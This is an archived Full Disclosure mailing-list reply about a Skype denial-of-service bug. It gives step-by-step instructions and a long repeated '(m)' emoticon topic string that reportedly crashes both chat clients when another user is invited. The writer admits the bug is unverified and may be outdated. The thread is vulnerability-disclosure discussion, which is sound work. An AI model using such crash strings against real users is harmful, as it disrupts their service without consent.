Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Skype - local & remote Denial Of Service vulnerability - crash exploit (0day)

From: "-= Glowing Sex =-" <doomxd () gmail com>
Date: Fri, 29 Jul 2011 06:41:03 +1000
Hello noptrix,
      I did not know of this one, but if you want to know one more, wich i
can credit one of #haxnet members ( dzl ) , for showing me , as follows :

You start a chatroom, you then set the TOPIC to some funny character i
believe it is (m) ,it produces a 'muscle' symbol anyhow, set this string for
example set it to:

"(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m)"

You get my drift right.. this will show a small emoticon, wich should show
an arm,with a muscle.

now, INVITE your friend to the room... it will crash BOTH clients on both
ends.
I am assuming this b0flow, is similar to your one,any cotact with an overly
long string and,seems chatting via your video, and then, topic set to overly
long emoticon string of muscly arms, they must be very much in the same area
of code i am assuming it is some str* based thing... but i could be wrong...
someone did show me this one, and it was awhile ago, so i am just wondering
if it still exists but i have a feeling , it does. i do not have a skype
client handy but i will ask the user,dzl, to show me the problem again as he
had shown me a screenshot but, this was a few weeks ago, and i would have to
dig around, so i will assume with confidence, and welcome to try it, just
makesure you use some emoticon,and it will b0nk it.
cheers
xd


On 29 July 2011 02:15, Levent Kayan <levonkayan () gmx net> wrote:


Hello,

http://www.youtube.com/watch?v=b9p4BZ0vsAI - vulnerability-lab.com

upcoming ~5 bugs soon.


cheers,
noptrix

--
Name: Levent 'noptrix' Kayan
E-Mail: noptrix () lamergarten net
GPG key: 0x014652c0
Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0
Homepage: http://www.noptrix.net/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: